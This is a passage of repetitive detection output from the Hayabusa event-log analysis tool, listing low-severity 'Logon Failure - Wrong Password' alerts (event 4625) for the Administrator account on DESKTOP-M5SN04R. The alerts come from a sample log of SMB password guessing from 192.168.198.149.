NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q3QxOH7ok8RR068t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJFj6Ckw1HdK9w52 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qqu3Im4HXQNyGnYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bk5dmjQDnpSlREum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pk4BvYgXBR2whf80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6n1su2TUr7ONQr4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: givsEAGfG0smN9Re : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i2YuM0i7a2QuY7xb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xuocQPZpd91adY0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PvGB1dZrfDWyZoqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4oi8iL88rJo7g2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cF3OUnytXi4NjvqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WKkJcp3TYj31iJUM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0E44RVqAE1feU0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny5LCb1qOIUhxOPY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9jcDgzzqH26DjQ1k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yil94cFkU6UP24SK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:45.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkdVHF3vggCcuNdn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:45.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4dRRI2CS3aVIX4nX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: chDZq3VgxIE2mRb9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HLVvgMmqLXKZADON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i4avO2AJSlNb0IUL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mdo5CvycGvGhn33y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: heJfjLl1vbX6lMjZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOP1E6hd4Jtj4gob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xa7kMCNz0bEGTBqX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSxTQ4HsZt2DeYVe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxHpSQwFSV4hveVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n3OwzSPomxZLoCe6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e9IfwDZIfYT6A50K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOf6DbRX4zlNqLdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00kXrnJNH40NyoYL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nsNHcb9pnpdRgeL7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucMhgxMXy9Ch1jNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cfi3ZaLTECJgjM9x : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: usugjEEBHlhJvOyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WQ1pM2CVLt5ITVD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NIboW7hNljF3HPpk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rOk5W4rkSYRRw4xS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJTfcwd8rnFc06iF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sm415W5zkvjdnTV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KEiSbtlmW4ou1mc7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xWeZV5pHt94adwUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5np7HeCPAFTDdTXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gXbe2jEJVtwaQXlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hZFiUCJnaBdHcw4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a71wyo41KV1ZoT7p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogB17WdeOiC19rqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ANOLPWG12lkW39Ei : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y1vf7OUxb6TH3Q4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bxU5yumSieUzSgzH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9K5EoWWASU8SlSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PwZLRPFxaFWwjZEe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8fXgFFb3HTMunsoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R1RozAr1uhux4cYW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7EmuUSv03RnhKsF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jw410HEW8EC3MC9f : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTYp8cEbt3Yggo3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWJVzgYLWIo7SGCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DP13jPdW5Gdl8z56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LNXOWjHmMDhfFVon : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kka1RiF3f7Nhkf8x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2o90lG6attzWU4ZN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PyPK9kuJdflQ4RKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a9I3El7d7anR0kIz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDUMTEfNhFuuqMle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e0F70d1WstkqnQgA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bm0txApQSp1U42N3 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JeEe5ENSIZnfc3FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oasE54Z1FlpswY0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bhje1BgvxOlG28JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L9iTIv4UQ4En9RA2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mg8KFm1lCeImj8Sb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
